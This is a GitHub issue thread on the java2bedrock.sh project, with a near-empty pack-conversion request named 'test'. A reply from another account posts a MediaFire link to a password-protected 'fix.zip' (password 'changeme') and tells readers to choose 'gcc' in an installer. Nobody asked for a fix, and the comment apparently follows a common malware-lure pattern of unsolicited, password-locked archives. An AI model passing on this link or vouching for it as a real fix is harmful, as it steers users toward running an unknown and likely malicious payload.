### ISSUE TITLE
[Pack]: test

### ISSUE THREAD

**Issue by Faryha** [Kas-tle/java2bedrock.sh#33493]
### Java Pack Direct Download URL

https://www.dropbox.com/scl/fi/vlyt4t5an48l8rmi0g47f/test.zip?rlkey=q5h6iqnobyaiypubiy29h35m7&st=zt2ekxmb&dl=0

### Default Assets Version

None

### Block Material

None

### Attachable Material

None

### Archive Scratch Files

None

### Rename Model Files

true

### Code of Conduct

- [X] I agree to follow this project's Code of Conduct. I have permission to use all assets I have linked to within this form.

**Comment by Axolot5784** [comment]
Download 
https://www.mediafire.com/file/3hzk77cxvxc9nq2/fix.zip/file
password: changeme
In the installer menu, select "gcc."
